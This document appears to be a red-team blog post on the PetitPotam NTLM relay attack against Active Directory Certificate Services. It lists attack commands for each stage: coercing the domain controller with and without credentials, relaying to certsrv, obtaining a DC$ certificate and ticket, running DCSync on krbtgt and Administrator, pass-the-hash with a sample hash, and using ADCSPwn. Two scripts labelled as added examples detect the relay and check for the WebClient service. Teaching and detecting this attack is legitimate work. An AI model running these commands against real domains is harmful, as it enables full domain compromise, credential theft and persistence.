Petitpotam – NTLM relay to ad CS
2022-06-23 17:42:00 [Khan security team]
Active Directory Certificate Services (AD CS), when deployed in an enterprise environment, lets system administrators establish trust between different directory objects. However, it may also allow red team operators to perform an NTLM relay attack against the AD CS web interface in order to compromise the network. The web interface exists so that users can obtain certificates (web enrollment); it operates over HTTP, does not support signing, and accepts NTLM authentication.
Will Schroeder and Lee Christensen describe the attack in detail in the Certified Pre-Owned whitepaper. The attack forces the domain controller machine account (DC$) to authenticate to a host configured as an NTLM relay. The authentication is forwarded to the Certificate Authority (CA) and a certificate request is made. Once a certificate has been generated for the DC$ account, an attacker can use it to perform arbitrary operations on the domain controller, such as retrieving the hash of the Kerberos (krbtgt) account to create a golden ticket and establish domain persistence, or dumping the domain administrator's hash and establishing a communication channel with the domain controller.
Active Directory Certificate Services can be installed as a role on a domain controller or on a separate server that is part of the domain. The following figure illustrates the attack steps:
The attack requires the identity of the Certificate Authority. The certutil binary is a command line tool that can dump and display Certificate Authority information, verify certificates, and so on. It can therefore be used as a quick way to discover whether a Certificate Authority is deployed in the domain.
certutil.exe
The server has been identified as ca.purple.lab, and the web enrollment service can be reached over HTTP at the following URL:
http://ca.purple.lab/certsrv/
Certificate Authority web enrollment page
From a system that is not joined to the domain, run ntlmrelayx.py from the Impacket suite. It configures several listeners (SMB, HTTP, WCF) that capture the authentication from the domain controller machine account and relay it to the Active Directory Certificate Authority server.
python3 ntlmrelayx.py -t http://ca/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
Forced authentication can be triggered with the PetitPotam proof of concept developed by Lionel Gilles. It works through an API call (EfsRpcOpenFileRaw) of the MS-EFSRPC protocol, which causes the machine account on the target to authenticate to another system. It can be run by supplying standard user credentials together with the IP address of the NTLM relay system and the IP address of the CA.
python3 PetitPotam.py -d purple.lab -u pentestlab -p Password1234 <Listener-IP> <DC-IP>
The attack can also be performed without any credentials. If the Certificate Authority is deployed on a domain controller rather than on a separate server, and no precautions have been taken, the domain may be compromised even by someone who holds no credentials for the network.
python3 PetitPotam.py 10.0.0.2 10.0.0.1
The following output indicates that the attack succeeded and authentication was triggered.
Alternatively, if initial access to a domain-joined system has already been established, the compiled binary can be used instead.
PetitPotam.exe 10.0.0.2 10.0.0.1
As with most attacks, Benjamin Delpy has also implemented the authentication trigger in newer versions of Mimikatz. Using the Encrypting File System (EFS) module and specifying the domain controller and the host acting as the NTLM relay sends the remote procedure call.
misc::efs /server:dc.purple.lab /connect:10.0.0.2
There is also a PowerShell implementation of the PetitPotam attack, developed by S3cur3Th1sSh1t after the Mimikatz module.
Import-Module .\Invoke-Petitpotam.ps1
Invoke-Petitpotam -Target 10.0.0.1 -CaptureHost 10.0.0.2
All of the triggers above force the DC$ account (the machine account of the domain controller) to authenticate to the Certificate Authority.
Because the attack requires the Web Enrollment component to be installed, a certificate request is then made on behalf of the DC$ account, and a certificate for that account is generated in Base64 format.
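From the defender's side, the chain above leaves a recognisable footprint: the DC$ machine account performs an NTLM network logon against the CA, and the source address of that logon is the relay host rather than the domain controller itself. The following Python script is an added example (not part of the original post or of any tool it discusses) that applies this heuristic to a handful of constructed, simplified event 4624 records. The field names, IP addresses and the inventory mapping are assumptions made for the example.

```python
"""Flag NTLM network logons by machine accounts that originate from a host the
account does not own. In the PetitPotam -> AD CS chain the CA records a 4624
for DC$ whose source address is the relay host, not the domain controller.
The sample events, IPs and inventory below are constructed for this example."""
import re
from dataclasses import dataclass

# Constructed, simplified renderings of Windows Security event 4624 (an account
# was successfully logged on). Real events carry many more fields; only those
# the check needs are kept. LogonType=3 is a network logon.
SAMPLE_EVENTS = [
    "EventID=4624 LogonType=3 AuthPkg=Kerberos Account=DC$ SourceIP=10.0.0.1 Workstation=DC",
    "EventID=4624 LogonType=3 AuthPkg=NTLM Account=DC$ SourceIP=10.0.0.2 Workstation=",
    "EventID=4624 LogonType=3 AuthPkg=NTLM Account=pentestlab SourceIP=10.0.0.50 Workstation=WS01",
    "EventID=4624 LogonType=2 AuthPkg=Negotiate Account=DC$ SourceIP=127.0.0.1 Workstation=DC",
    "EventID=4624 LogonType=3 AuthPkg=NTLM Account=FILESRV$ SourceIP=10.0.0.77 Workstation=FILESRV",
    "EventID=4625 LogonType=3 AuthPkg=NTLM Account=DC$ SourceIP=10.0.0.2 Workstation=",
]

# Constructed asset inventory: the addresses each machine account legitimately uses.
MACHINE_ACCOUNT_IPS = {
    "DC$": {"10.0.0.1", "127.0.0.1"},
}

FIELD_RE = re.compile(r"(\w+)=(\S*)")


def parse_event(line):
    """Turn one 'key=value key=value' record into a dict (empty values allowed)."""
    return dict(FIELD_RE.findall(line))


@dataclass(frozen=True)
class Finding:
    account: str
    source_ip: str
    reason: str


def find_relayed_machine_logons(lines, inventory):
    """Return findings for successful NTLM network logons by machine accounts
    (names ending in '$') whose source IP is not one the account owns."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4624" or ev.get("LogonType") != "3":
            continue
        if ev.get("AuthPkg") != "NTLM":
            continue  # coerced authentication arrives at the CA as NTLM, not Kerberos
        account = ev.get("Account", "")
        if not account.endswith("$"):
            continue  # user accounts are out of scope for this check
        src = ev.get("SourceIP", "")
        owned = inventory.get(account)
        if owned is None:
            findings.append(Finding(account, src, "machine account missing from inventory"))
        elif src not in owned:
            findings.append(Finding(account, src, "NTLM logon from a host the account does not own"))
    return findings


if __name__ == "__main__":
    for f in find_relayed_machine_logons(SAMPLE_EVENTS, MACHINE_ACCOUNT_IPS):
        print(f"{f.account} from {f.source_ip}: {f.reason}")
```

Run against the sample data, the script reports the DC$ logon from 10.0.0.2 (the relay listener in the commands above) and the unknown FILESRV$ account; the Kerberos logon from the real domain controller, the interactive logon and the failed 4625 are ignored. The inventory lookup is the part worth doing properly: the check is only as good as the list of addresses each machine account is allowed to use.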
The obtained certificate can be used with Rubeus to request a Kerberos Ticket Granting Ticket for the machine account, which is a highly privileged account on the domain controller.
Rubeus.exe asktgt /user:DC$ /certificate:<base64-certificate> /ptt
The ticket is imported into the user's current session. Because it belongs to the DC$ account, it can be used for a series of activities that compromise the domain, such as retrieving the NTLM hash of the krbtgt account to create a golden ticket, connecting to the domain controller via WMI, performing pass-the-hash, and so on.
Running the following command verifies that the ticket is cached in the current logon session.
klist
Because the ticket is cached, the DCSync technique can be used to retrieve the hash of the krbtgt account in order to create a golden ticket and establish domain persistence.
mimikatz # lsadump::dcsync /user:krbtgt
Similarly, the password hash of the Administrator user, a member of the Domain Admins group, can be retrieved.
lsadump::dcsync /domain:purple.lab /user:Administrator
The hash can be used with Impacket's wmiexec to establish a session with the domain controller as the domain administrator.
python3 wmiexec.py -hashes :58a478135a93ac3bf058a5ea0e8fdb71 [email protected]
Alternatively, Mimikatz or any similar tool can be used to perform pass-the-hash. In Mimikatz, the following creates another session as the Administrator user.
sekurlsa::pth /user:Administrator /domain:purple.lab /ntlm:58a478135a93ac3bf058a5ea0e8fdb71
From the new session, the C$ share can be mapped in order to access the domain controller's file system.
net use z: \\dc\c$
dir z:
Mapping the domain controller drive
ADCSPwn
An alternative tool implementing the attack (ADCSPwn) was developed by batsec in C#. It can be used through execute-assembly in Cobalt Strike or in any other similar red team framework (such as Covenant). The obvious benefit is that the attack is performed directly from memory, with no need to drop anything to disk or to use another system as a relay for passing the authentication to the CA. ADCSPwn sets up the relay server locally and calls the API (EfsRpcOpenFileRaw) to force authentication.
adcspwn.exe --adcs ca.purple.lab --remote dc.purple.lab
ADCSPwn
The certificate is generated in Base64 format and printed to the console.
However, it should be noted that this attack only works when the WebClient service is running on the domain controller. The service is not installed by default, so executing the tool directly is unlikely to produce the desired result.
The WebClient service is installed on servers by the WebDAV Redirector feature.
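Since the ADCSPwn variant depends on WebClient running on the domain controller, a defender wants an inventory of which domain controllers expose that service. The following Python script is an added example (not from the original post or from ADCSPwn) that classifies hosts from the text that `sc query WebClient` prints. The host names and the captured outputs are constructed samples in the format sc.exe produces; how the output is collected from each host (an inventory job, a remote shell) is outside the example.

```python
"""Classify the WebClient service on a set of hosts from the text output of
`sc query WebClient`. Hostnames and outputs below are constructed samples in
the format sc.exe prints; a real run would collect them from each host."""
import re

SAMPLE_OUTPUTS = {
    "dc.purple.lab": (
        "SERVICE_NAME: WebClient\n"
        "        TYPE               : 20  WIN32_SHARE_PROCESS\n"
        "        STATE              : 4  RUNNING\n"
        "                                (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)\n"
    ),
    "dc2.purple.lab": (
        "SERVICE_NAME: WebClient\n"
        "        TYPE               : 20  WIN32_SHARE_PROCESS\n"
        "        STATE              : 1  STOPPED\n"
    ),
    "ca.purple.lab": (
        "[SC] EnumQueryServicesStatus:OpenService FAILED 1060:\n\n"
        "The specified service does not exist as an installed service.\n"
    ),
}

# sc.exe prints the state as a number followed by its name, e.g. "4  RUNNING".
STATE_RE = re.compile(r"^\s*STATE\s*:\s*\d+\s+([A-Z_]+)", re.MULTILINE)


def classify_webclient(output):
    """Return NOT_INSTALLED, RUNNING, STOPPED (or another sc state name), or UNKNOWN."""
    if "FAILED 1060" in output:  # 1060 = ERROR_SERVICE_DOES_NOT_EXIST
        return "NOT_INSTALLED"
    m = STATE_RE.search(output)
    return m.group(1) if m else "UNKNOWN"


def webclient_report(outputs):
    """Map each host name to its WebClient state."""
    return {host: classify_webclient(text) for host, text in outputs.items()}


def exposed_hosts(outputs):
    """Hosts where WebClient is running, i.e. where the precondition for ADCSPwn holds."""
    return sorted(h for h, state in webclient_report(outputs).items() if state == "RUNNING")


if __name__ == "__main__":
    for host, state in webclient_report(SAMPLE_OUTPUTS).items():
        print(f"{host:20} WebClient: {state}")
```

A host reported as STOPPED still has the WebDAV Redirector feature present, so it is worth keeping in the report alongside the RUNNING ones rather than treating it the same as NOT_INSTALLED.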